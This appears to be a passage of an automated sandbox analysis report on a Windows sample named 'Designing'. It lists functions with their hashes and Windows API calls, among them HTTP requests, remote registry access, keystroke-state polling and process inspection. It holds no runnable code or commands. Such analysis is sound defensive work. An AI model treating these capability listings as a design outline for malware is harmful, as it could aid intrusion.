                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharLower_memmove
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 3425801089-567219261
                                              • Opcode ID: 2d85adb1041e20453bbc720c867bfa98a22d05614c3290a55d14436531398d45
                                              • Instruction ID: 50890791150c8c8a58455494d13caf373f4accc6b585ad769e002edaa4761adf
                                              • Opcode Fuzzy Hash: 2d85adb1041e20453bbc720c867bfa98a22d05614c3290a55d14436531398d45
                                              • Instruction Fuzzy Hash: 4431B271904219AFCF10EF58CD809EEB3F4FF05310B108AA9F826976D1DB32AA45CB80
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00B8B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00B8B7BD
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B89ACC
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B89ADF
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B89B0F
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$_memmove$ClassName
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 365058703-1403004172
                                              • Opcode ID: 3f58d0c8c04c82123f3d5497428224acf3451e9482678e473665b7742e276181
                                              • Instruction ID: de70fa81236d4fe888aad01eca25b83831a7e9181896231ea366a3e8b8131d9f
                                              • Opcode Fuzzy Hash: 3f58d0c8c04c82123f3d5497428224acf3451e9482678e473665b7742e276181
                                              • Instruction Fuzzy Hash: 9E21F071E00104AADF14BBA4DC86DFEB7E8DF55360F184699F821A72E1DB340D49E720
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BA1F18
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA1F3E
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BA1F6E
                                              • InternetCloseHandle.WININET(00000000), ref: 00BA1FB5
                                                • Part of subcall function 00BA2B4F: GetLastError.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B64
                                                • Part of subcall function 00BA2B4F: SetEvent.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B79
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: 7e3c7e3044a8a7abd792ace3b340132028a59cce08d265775319e8adf0926af2
                                              • Instruction ID: c02123ed93c9b0ba69e977d1f82f84d5464a09ff6b9116befa5d064bcb90b422
                                              • Opcode Fuzzy Hash: 7e3c7e3044a8a7abd792ace3b340132028a59cce08d265775319e8adf0926af2
                                              • Instruction Fuzzy Hash: 4C2101B1608208BFEB51AF28CCC5EBF77EDEB4AB84F00055AF405A7200DB259D049BB0
                                              APIs
                                                • Part of subcall function 00B32111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B3214F
                                                • Part of subcall function 00B32111: GetStockObject.GDI32(00000011), ref: 00B32163
                                                • Part of subcall function 00B32111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B3216D
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BB6A86
                                              • LoadLibraryW.KERNEL32(?), ref: 00BB6A8D
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BB6AA2
                                              • DestroyWindow.USER32(?), ref: 00BB6AAA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: 3f37351d8ddcf4bdc6864638f5dadd26cb1a8d8e7fabb9399dc82df38885e2f2
                                              • Instruction ID: 5373694a7cbed2f8558df35214fa9f0be717a47b556b739c6d0ab93e4d9a2119
                                              • Opcode Fuzzy Hash: 3f37351d8ddcf4bdc6864638f5dadd26cb1a8d8e7fabb9399dc82df38885e2f2
                                              • Instruction Fuzzy Hash: 76218871200205AFEF109FA4DC80EFB77EDEB59324F148668FA50A3190D7B99C519760
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00B97377
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B973AA
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00B973BC
                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B973F6
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: b0bb058bf72e0ae97998a1534107627e92b049cc15f2028c39889df91ad60b5a
                                              • Instruction ID: 01bbcd1007d154becf5fa529b17c649e21b55b99d2d699d9e8aad8d1328ec6e7
                                              • Opcode Fuzzy Hash: b0bb058bf72e0ae97998a1534107627e92b049cc15f2028c39889df91ad60b5a
                                              • Instruction Fuzzy Hash: 8A219C70558206ABDF209F69DC44E9A7BE4EF45720F204AA9FCA0D72E0DB709851DB64
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00B97444
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B97476
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00B97487
                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B974C1
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: 29b2f3eba349335cdd647a7cca32d5db9829f0a771847f721d68960937905555
                                              • Instruction ID: 3a4b7e264ac75670903c1bf410f80ec5267d9f1cd68c2601c7b37eb2c1204688
                                              • Opcode Fuzzy Hash: 29b2f3eba349335cdd647a7cca32d5db9829f0a771847f721d68960937905555
                                              • Instruction Fuzzy Hash: 1A2192316582069BDF209F699C44E9A7BE8EF55720F200AA9F9A0E73D1DF709850C751
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00B9B297
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B9B2EB
                                              • __swprintf.LIBCMT ref: 00B9B304
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BC0980), ref: 00B9B342
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume__swprintf
                                              • String ID: %lu
                                              • API String ID: 3164766367-685833217
                                              • Opcode ID: 96d2ba87de9982f41c44863805724df271525fa5747b4e328bc4acc35dfb8d88
                                              • Instruction ID: 57ea97bfdfac75f908aaa576452e2bd55f4cdbff94bcf59621718f5a131dfd54
                                              • Opcode Fuzzy Hash: 96d2ba87de9982f41c44863805724df271525fa5747b4e328bc4acc35dfb8d88
                                              • Instruction Fuzzy Hash: FA216231A00108AFCB10EF65C885DAEB7F8EF49704F1440A9F905DB352DB31EA45CB61
                                              APIs
                                                • Part of subcall function 00B41821: _memmove.LIBCMT ref: 00B4185B
                                                • Part of subcall function 00B8AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B8AA6F
                                                • Part of subcall function 00B8AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8AA82
                                                • Part of subcall function 00B8AA52: GetCurrentThreadId.KERNEL32 ref: 00B8AA89
                                                • Part of subcall function 00B8AA52: AttachThreadInput.USER32(00000000), ref: 00B8AA90
                                              • GetFocus.USER32 ref: 00B8AC2A
                                                • Part of subcall function 00B8AA9B: GetParent.USER32(?), ref: 00B8AAA9
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00B8AC73
                                              • EnumChildWindows.USER32(?,00B8ACEB), ref: 00B8AC9B
                                              • __swprintf.LIBCMT ref: 00B8ACB5
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                              • String ID: %s%d
                                              • API String ID: 1941087503-1110647743
                                              • Opcode ID: 6f22d9ca4fdd83049ad0f6f65ab359550c1ae614fd4d93705e3bc7067b230ba3
                                              • Instruction ID: a80fb03a37320a689212bd8fa92fb9dddeab08ce9bdc9747ce6ec2e8b22175ec
                                              • Opcode Fuzzy Hash: 6f22d9ca4fdd83049ad0f6f65ab359550c1ae614fd4d93705e3bc7067b230ba3
                                              • Instruction Fuzzy Hash: E9119075600205ABEF11BFA4CD85FAA37ECEB48710F0440F6BE08AA162DB705955DB72
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00B92318
                                               Memory Dump Source
                                               • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
                                              • Opcode ID: ee5ba7ff49ead61d11d4dc2e8fa94caf6e1d726dfa8ef2af61fe1522501907d6
                                              • Instruction ID: 9cdad57688e28f2dbf4176d5ce40af1c5b03b7f621cffc8eab4fdca782ae1a7d
                                              • Opcode Fuzzy Hash: ee5ba7ff49ead61d11d4dc2e8fa94caf6e1d726dfa8ef2af61fe1522501907d6
                                              • Instruction Fuzzy Hash: 1D113C31D201199FCF00EF94DA519EEB7F4FF16344B1084E9D81467292EB365E0ACB50
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BAF2F0
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BAF320
                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BAF453
                                              • CloseHandle.KERNEL32(?), ref: 00BAF4D4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                              • String ID:
                                              • API String ID: 2364364464-0
                                              • Opcode ID: f9987f18520d93314555c5b0d4040f51919bb3a05f75fe07d0a1732601e23f20
                                              • Instruction ID: 045ce5a3bbb9f1eae02a1b20d5d3a119035f610d0670980b001bd6162803c407
                                              • Opcode Fuzzy Hash: f9987f18520d93314555c5b0d4040f51919bb3a05f75fe07d0a1732601e23f20
                                              • Instruction Fuzzy Hash: 558192716143019FD720EF64D886F6BB7E5AF48710F1489ADF999DB392DBB0AC008B91
                                              APIs
                                                • Part of subcall function 00B41A36: _memmove.LIBCMT ref: 00B41A77
                                                • Part of subcall function 00BB147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BB040D,?,?), ref: 00BB1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BB075D
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BB079C
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BB07E3
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00BB080F
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BB081C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: 9a9732b9812bd00898fb7ddbdf173ff0739b95468478734b34af502e6da53cfb
                                              • Instruction ID: d8c705b153d1ad56d1aceac64ed812613c0be4a2e109a586018cd496d112e8b5
                                              • Opcode Fuzzy Hash: 9a9732b9812bd00898fb7ddbdf173ff0739b95468478734b34af502e6da53cfb
                                              • Instruction Fuzzy Hash: DA514971618204AFC704EF68CC91EBBB7E9EF88304F14899DF596872A1DB70E944DB52
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B9EC62
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B9EC8B
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B9ECCA
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B9ECEF
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B9ECF7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                              • String ID:
                                              • API String ID: 1389676194-0
                                              • Opcode ID: f8b5869c474afeaafc634dc6f81a00961c5bd219020872f1371078c4425c78d6
                                              • Instruction ID: 7c8291f20a6264b4d1440d32f28a140c777fb5ff837f27d244f5ee21e50cc54e
                                              • Opcode Fuzzy Hash: f8b5869c474afeaafc634dc6f81a00961c5bd219020872f1371078c4425c78d6
                                              • Instruction Fuzzy Hash: F3510735A00109DFCB01EF64C985AAEBBF5EF09314B1884E9E859AB361CB31ED51DB50
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5d85ffa02137630237a4d222e2a8244e69ab4e993c9b1cfebdbef3a08ba65dd
                                              • Instruction ID: 6e02a016b4a9dfc1a6bc674788632c0a1fda5bd3da4c4ac81aada0cc11eefff4
                                              • Opcode Fuzzy Hash: c5d85ffa02137630237a4d222e2a8244e69ab4e993c9b1cfebdbef3a08ba65dd
                                              • Instruction Fuzzy Hash: E941AF75D08214AFD7209B29CC88FF9BBF8EB0A350F1401E5E916A72D1CEB0AD41DA51
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 00B32727
                                              • ScreenToClient.USER32(00BF77B0,?), ref: 00B32744
                                              • GetAsyncKeyState.USER32(00000001), ref: 00B32769
                                              • GetAsyncKeyState.USER32(00000002), ref: 00B32777
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AsyncState$ClientCursorScreen
                                              • String ID:
                                              • API String ID: 4210589936-0
                                              • Opcode ID: bc62aa8538f0079eb102f3b73a5efd441f68961ce33106e0673de924b68e9ef0
                                              • Instruction ID: 4e15194b38cd8b79ca2eb23cafe95da51ac137e04e6a3d068b92be5635b495e5
                                              • Opcode Fuzzy Hash: bc62aa8538f0079eb102f3b73a5efd441f68961ce33106e0673de924b68e9ef0
                                              • Instruction Fuzzy Hash: 84416D35504119FFDF159F69C884EF9BBB4FB09324F2083AAF86896290CB34AD50DB91
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00B895E8
                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00B89692
                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B8969A
                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00B896A8
                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B896B0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: 2c3118948dbbbd8e1f544fe650935c79fae55460c5792cc013bb4600fa8c8966
                                              • Instruction ID: 01c6b55bb6d9ca309021a685b95489a6d5cc4ca48de9201db0704b659fbed148
                                              • Opcode Fuzzy Hash: 2c3118948dbbbd8e1f544fe650935c79fae55460c5792cc013bb4600fa8c8966
                                              • Instruction Fuzzy Hash: 2831FF71900219EFDF10DF68D94CAAE7BB5FB44315F144268F924AB1E0D7B09920CB90
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00B8BD9D
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B8BDBA
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B8BDF2
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B8BE18
                                              • _wcsstr.LIBCMT ref: 00B8BE22
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                              • String ID:
                                              • API String ID: 3902887630-0
                                              • Opcode ID: 1631f3d899c2a0e0da1b47887371646d76dfc758a1c4ed708fef884d07e8a931
                                              • Instruction ID: 2e4b672365e2a43e6a05a60e79afca78dfafd0e48a83d5f976736113b4795403
                                              • Opcode Fuzzy Hash: 1631f3d899c2a0e0da1b47887371646d76dfc758a1c4ed708fef884d07e8a931
                                              • Instruction Fuzzy Hash: B521C232208204BEEB256F399C49EBB7BD8DF49761F1044B9FD09DA1A1EF619C50D3A0
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BBB804
                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00BBB829
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BBB841
                                              • GetSystemMetrics.USER32(00000004), ref: 00BBB86A
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BA155C,00000000), ref: 00BBB888
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Long$MetricsSystem
                                              • String ID:
                                              • API String ID: 2294984445-0
